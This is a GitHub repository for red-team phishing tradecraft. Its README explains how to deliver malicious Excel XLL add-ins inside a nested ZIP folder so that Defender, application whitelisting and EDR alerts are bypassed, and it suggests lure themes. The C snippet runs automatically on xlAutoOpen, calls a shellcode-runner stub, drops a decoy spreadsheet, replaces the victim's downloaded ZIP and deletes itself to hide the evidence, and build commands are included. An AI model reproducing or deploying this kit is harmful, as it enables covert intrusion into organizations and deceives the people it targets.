├── xll_download.gif ├── LICENSE ├── ingestfile.c ├── snippet.c └── README.md /xll_download.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Octoberfest7/XLL_Phishing/HEAD/xll_download.gif -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Octoberfest7 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ingestfile.c: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | #include 3 | #include 4 | #include 5 | #include 6 | int main(int argc, char** argv) 7 | { 8 | FILE* fileptr; 9 | unsigned char* buffer; 10 | long filelen; 11 | 12 | fileptr = fopen(argv[1], "rb"); // Open the file in binary mode 13 | fseek(fileptr, 0, SEEK_END); // Jump to the end of the file 14 | filelen = ftell(fileptr); // Get the current byte offset in the file 15 | rewind(fileptr); // Jump back to the beginning of the file 16 | 17 | buffer = (unsigned char*)malloc(filelen * sizeof(unsigned char)); // Enough memory for the file 18 | fread(buffer, filelen, 1, fileptr); // Read in the entire file 19 | fclose(fileptr); // Close the file 20 | char* shellcode = malloc(300000 * sizeof(char)); 21 | int bufflength = filelen * 6; 22 | int i; 23 | for (i = 0; i < filelen; i++) 24 | { 25 | 26 | sprintf(&shellcode[i * 6], "0x%02X, ", buffer[i]); 27 | 28 | } 29 | shellcode[bufflength - 2] = '\0'; 30 | printf("%s\n", shellcode); 31 | printf("buffer length is %d", filelen); 32 | free(buffer); 33 | free(shellcode); 34 | } 35 | -------------------------------------------------------------------------------- /snippet.c: -------------------------------------------------------------------------------- 1 | //This is an example code snippet for the XLL/XLSX manipulation detailed in this paper. 2 | //This snippet was not written to be able to compile on its own, you will need to take and modify the code to suit your needs. 3 | 4 | //Byte array containing xlsx spreadsheet to be dropped in appdata\local\temp 5 | BYTE xlsx[1] = {0xFF}; 6 | 7 | //Byte array containing second zip folder with the same folder, but the xlsx spreadsheet instead of the XLL. To replace original zip. 8 | BYTE zipfile[1] = {0xFF}; 9 | 10 | //Runner function. Your shellcode runner here 11 | void Runner() 12 | { 13 | //Stuff 14 | } 15 | 16 | //Self-Deletion function 17 | void deleteme() 18 | { 19 | WCHAR wcPath[MAX_PATH + 1]; 20 | RtlSecureZeroMemory(wcPath, sizeof(wcPath)); 21 | HMODULE hm = NULL; 22 | 23 | //Get Handle to our DLL based on Runner() function 24 | GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)Runner, &hm); 25 | 26 | //Get path of our DLL 27 | GetModuleFileNameW(hm, wcPath, sizeof(wcPath)); 28 | 29 | //Close handle to our DLL 30 | CloseHandle(hm); 31 | 32 | //Open handle to DLL with delete flag 33 | HANDLE hCurrent = CreateFileW(wcPath, DELETE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 34 | 35 | // rename the associated HANDLE's file name 36 | FILE_RENAME_INFO* fRename; 37 | LPWSTR lpwStream = L":myname"; 38 | DWORD bslpwStream = (wcslen(lpwStream)) * sizeof(WCHAR); 39 | 40 | DWORD bsfRename = sizeof(FILE_RENAME_INFO) + bslpwStream; 41 | fRename = (FILE_RENAME_INFO*)malloc(bsfRename); 42 | memset(fRename, 0, bsfRename); 43 | fRename->FileNameLength = bslpwStream; 44 | memcpy(fRename->FileName, lpwStream, bslpwStream); 45 | SetFileInformationByHandle(hCurrent, FileRenameInfo, fRename, bsfRename); 46 | CloseHandle(hCurrent); 47 | 48 | // open another handle, trigger deletion on close 49 | hCurrent = CreateFileW(wcPath, DELETE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 50 | 51 | // set FILE_DISPOSITION_INFO::DeleteFile to TRUE 52 | FILE_DISPOSITION_INFO fDelete; 53 | RtlSecureZeroMemory(&fDelete, sizeof(fDelete)); 54 | fDelete.DeleteFile = TRUE; 55 | SetFileInformationByHandle(hCurrent, FileDispositionInfo, &fDelete, sizeof(fDelete)); 56 | 57 | // trigger the deletion deposition on hCurrent 58 | CloseHandle(hCurrent); 59 | } 60 | 61 | //Function to perform XLL/XLSX manipulation 62 | void SpawnXlsx() 63 | { 64 | //--------------------------------Get path of XLL-------------------------------------------- 65 | WCHAR xllPath[MAX_PATH]; 66 | RtlSecureZeroMemory(xllPath, sizeof(xllPath)); 67 | HMODULE hm = NULL; 68 | //Get Handle to our XLL based on Runner() function 69 | GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)Runner, &hm); 70 | //Get path 71 | GetModuleFileNameW(hm, xllPath, sizeof(xllPath)); 72 | 73 | //-------------------------replace xll filename with xlsx filename---------------------------- 74 | WCHAR* pos; 75 | int index = 0; 76 | int owlen; 77 | WCHAR xllFileName[] = L"importantdoc.xll"; 78 | WCHAR xlsxFileName[] = L"importantdoc.xlsx"; 79 | 80 | owlen = wcslen(xllFileName); 81 | 82 | // Fix: If oldWord and newWord are same it goes to infinite loop 83 | if (!wcscmp(xllFileName, xlsxFileName)) 84 | { 85 | return; 86 | } 87 | pos = wcsstr(xllPath, xllFileName); 88 | // Index of current found word 89 | index = pos - xllPath; 90 | 91 | // Terminate str after word found index 92 | xllPath[index] = L'\0'; 93 | 94 | // Concatenate str with new word 95 | wcscat(xllPath, xlsxFileName); 96 | 97 | //------------------------------Write XLSX to disk------------------------------------------ 98 | DWORD dwBytesWritten = 0; 99 | HANDLE hFile = NULL; 100 | 101 | hFile = CreateFileW(xllPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 102 | WriteFile(hFile, xlsx, sizeof(xlsx), &dwBytesWritten, NULL); 103 | CloseHandle(hFile); 104 | 105 | //--------------------------------Get Excel location---------------------------------------- 106 | WCHAR szFileName[MAX_PATH]; 107 | GetModuleFileNameW(NULL, szFileName, MAX_PATH); 108 | 109 | //---------------------combine excel location with xlsx location---------------------------- 110 | WCHAR cmdArgs[510]; 111 | swprintf_s(cmdArgs, MAX_PATH, L"%ls %ls", szFileName, xllPath); 112 | 113 | //--------------------------------------Spawn XLSX------------------------------------------ 114 | 115 | STARTUPINFO si; 116 | PROCESS_INFORMATION pi; 117 | 118 | ZeroMemory(&si, sizeof(si)); 119 | si.cb = sizeof(si); 120 | ZeroMemory(&pi, sizeof(pi)); 121 | 122 | CreateProcessW(NULL, cmdArgs, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 123 | 124 | //---------------------------Find and set path for dummy zip file--------------------------- 125 | WCHAR zipPath[MAX_PATH]; 126 | WCHAR envVarName[] = L"HOMEPATH"; 127 | WCHAR downloads[] = L"\\Downloads\\ZIPFILENAME"; 128 | 129 | //Get home dir of user 130 | GetEnvironmentVariableW(envVarName, zipPath, MAX_PATH); 131 | 132 | // Concatenate str with new word 133 | wcscat(zipPath, downloads); 134 | 135 | //--------Try to delete original zip file. If successful, write dummy zip in it's place-------- 136 | if(DeleteFileW(zipPath)) 137 | { 138 | hFile = CreateFileW(zipPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 139 | WriteFile(hFile, zipfile, sizeof(zipfile), &dwBytesWritten, NULL); 140 | CloseHandle(hFile); 141 | } 142 | 143 | //Delete XLL in appdata\local\temp directory 144 | deleteme(); 145 | } 146 | 147 | int xlAutoOpen() 148 | { 149 | Runner(); 150 | SpawnXlsx(); 151 | return 0; 152 | } 153 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XLL_Phishing 2 | 3 | ## Introduction 4 | With Microsoft's [recent announcement](https://docs.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method: 5 | 6 | 1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful. 7 | 2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed? 8 | 3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc? 9 | 4. Defenses - Is application whitelisting enforced? 10 | 5. Detection - What kind of AV/EDR is the client running? 11 | 12 | These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat. 13 | 14 | This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution. 15 | 16 | Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target. 17 | 18 | ## What are XLL's? 19 | 20 | XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents. 21 | 22 | ![image](https://user-images.githubusercontent.com/91164728/168444804-2ca82465-ef4a-49d7-b0c2-7d570f69f562.png) 23 | 24 | XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice. 25 | 26 | The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time. 27 | 28 | There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen [here](https://docs.microsoft.com/en-us/office/client-developer/excel/add-in-manager-and-xll-interface-functions): 29 | 30 | ![image](https://user-images.githubusercontent.com/91164728/168409483-8433b74d-cb40-4b67-bbc1-6ed1e55f5a9c.png) 31 | 32 | Upon double clicking an XLL, the user is greeted by this screen: 33 | 34 | ![image](https://user-images.githubusercontent.com/91164728/168440184-fb48346b-50d7-427e-8075-5ad28b350128.png) 35 | 36 | This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured. 37 | 38 | Something that must be kept in mind is that XLL's, being executables, are **architecture specific**. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for. 39 | 40 | There is a pretty clean break in Office versions that can be used as a rule of thumb: 41 | 42 | Office 2016 or earlier: x86 43 | 44 | Office 2019 or later: x64 45 | 46 | It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system. 47 | 48 | ### Resources 49 | The XLL payload that was built during this research was based on [this](https://github.com/edparcell/HelloWorldXll) project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file. 50 | 51 | A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the [latest Excel SDK](https://docs.microsoft.com/en-us/office/client-developer/excel/welcome-to-the-excel-software-development-kit) and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README. 52 | 53 | ## Delivery 54 | Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on: 55 | 56 | 1. Email Attachment 57 | 2. Web Delivery 58 | 59 | ### Email Attachment 60 | Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to: 61 | 62 | 1. Block executable attachments (EXE, DLL, XLL, MZ headers overall) 63 | 2. Block containers like ISO/IMG which are mountable and may contain executable content 64 | 3. Examine zip files and block those containing executable content 65 | 4. Block zip files that are password protected 66 | 5. More 67 | 68 | Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered. 69 | 70 | For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery. 71 | 72 | ### Web Delivery 73 | Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring [packers/containers](https://github.com/mgeeky/PackMyPayload). 74 | 75 | The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim. 76 | 77 | The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered. 78 | 79 | Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files. 80 | 81 | ## Zip files and execution 82 | Zip files were chosen as a container for our XLL payload because: 83 | 84 | 1. They are natively compatible with Windows 85 | 2. They are allowed to be downloaded from the internet by the organization 86 | 3. They add very little additional complexity to the attack 87 | 88 | Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer: 89 | 90 | ![image](https://user-images.githubusercontent.com/91164728/168442329-dd42fc50-227f-4cfd-b085-a5f328d3b5b8.png) 91 | 92 | Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code. 93 | 94 | ![image](https://user-images.githubusercontent.com/91164728/168442713-f77c97a4-84c4-4c85-b9a1-e91ef0950973.png) 95 | 96 | Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert: 97 | ![image](https://user-images.githubusercontent.com/91164728/168442841-347cde78-c75d-4d08-9d34-9732e7604c5c.png) 98 | 99 | However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip\, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in: 100 | 101 | ![image](https://user-images.githubusercontent.com/91164728/168443168-97c78465-9536-44dd-9024-912c876367ed.png) 102 | 103 | This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify **any** sort of actual code execution in this location as malicious. 104 | 105 | If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP. 106 | 107 | This problem caused me to begin considering a different payload type than XLL; I began exploring [VSTO's](https://medium.com/@airlockdigital/make-phishing-great-again-vsto-office-files-are-the-new-macro-nightmare-e09fcadef010), which are Visual Studio Templates for Office. I highly encourage you to check out that article. 108 | 109 | VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's 110 | do not mitigate any of the issues in this scenario that our XLL payload is running into. 111 | 112 | We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV. 113 | 114 | I spent many hours brain storming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work. 115 | 116 | This time I created a folder, placed the XLL inside it, and then zipped the folder: 117 | 118 | ![image](https://user-images.githubusercontent.com/91164728/168444586-ffbd72c2-33ca-4248-a50e-f56a67fad29b.png) 119 | 120 | Clicking into the folder reveals the XLL file: 121 | 122 | ![image](https://user-images.githubusercontent.com/91164728/168444603-35fcd705-97c2-4e32-855b-ccad2958be50.png) 123 | 124 | Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created: 125 | 126 | ![image](https://user-images.githubusercontent.com/91164728/168444636-12447363-fa02-4a85-abcb-5099b46da9e2.png) 127 | 128 | Clicking enable executes our code without flagging Defender: 129 | 130 | ![image](https://user-images.githubusercontent.com/91164728/168444667-71bb8bc0-6e0d-4a7c-b4db-269173fa821f.png) 131 | 132 | Nice! Code execution. Now what? 133 | 134 | ## Tradecraft 135 | 136 | The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system. 137 | 138 | The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for. 139 | 140 | We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension. 141 | 142 | Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on [Payload Capabilities in C](https://github.com/Octoberfest7/Mutants_Sessions_Self-Deletion), namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk, and the XLSX of the same name being dropped in it's place. To the undiscerning eye, it will appear that the XLSX was there the entire time. 143 | 144 | Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\temp\local folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution in addition to the aforementioned actions, the XLL could try and locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in it's place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically. 145 | 146 | ![image](https://user-images.githubusercontent.com/91164728/168448788-2bd74847-b7ac-4792-bd36-3cc3bbf5f00f.png) 147 | 148 | This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist. 149 | 150 | Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk. 151 | 152 | This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs. 153 | 154 | ![](xll_download.gif) 155 | 156 | ## Detection 157 | 158 | As always, we will ask "What does MDE see?" 159 | 160 | A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11: 161 | 162 | ![image](https://user-images.githubusercontent.com/91164728/168449233-2d107bb9-3091-462d-844d-aff5242a1f9f.png) 163 | 164 | ![image](https://user-images.githubusercontent.com/91164728/168449265-55c66ee0-b369-406e-b2d6-86ddd4fa71d1.png) 165 | 166 | ![image](https://user-images.githubusercontent.com/91164728/168449272-6f55fd4d-7324-4df0-a6bf-fa2f7a571ae0.png) 167 | 168 | First off, zero alerts: 169 | 170 | ![image](https://user-images.githubusercontent.com/91164728/168449180-265642af-c092-437b-800a-5286fd1b1d88.png) 171 | 172 | What does the timeline/event log capture? 173 | 174 | ![image](https://user-images.githubusercontent.com/91164728/168449132-5d4f3ada-8449-4c64-9688-e585ed1274ae.png) 175 | 176 | Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok. 177 | 178 | ## Code Sample 179 | The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc. 180 | 181 | ### Compiling and setup 182 | 183 | I have included the [source code](https://github.com/Octoberfest7/XLL_Phishing/blob/main/ingestfile.c) for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX and store them in their respective byte arrays. Compile this code using: 184 | 185 | ``` 186 | gcc -o ingestfile ingestfile.c 187 | ``` 188 | 189 | I had some issues getting my XLL's to compile using MingW on a kali machine so thought I would post the commands here: 190 | 191 | **x64** 192 | ``` 193 | x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 194 | ``` 195 | 196 | **x86** 197 | ``` 198 | i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 199 | ``` 200 | 201 | After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using: 202 | 203 | ``` 204 | zip -r .zip / 205 | ``` 206 | 207 | Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file. 208 | 209 | ## Conclusion 210 | With the dominance of Office Macro's coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful! 211 | --------------------------------------------------------------------------------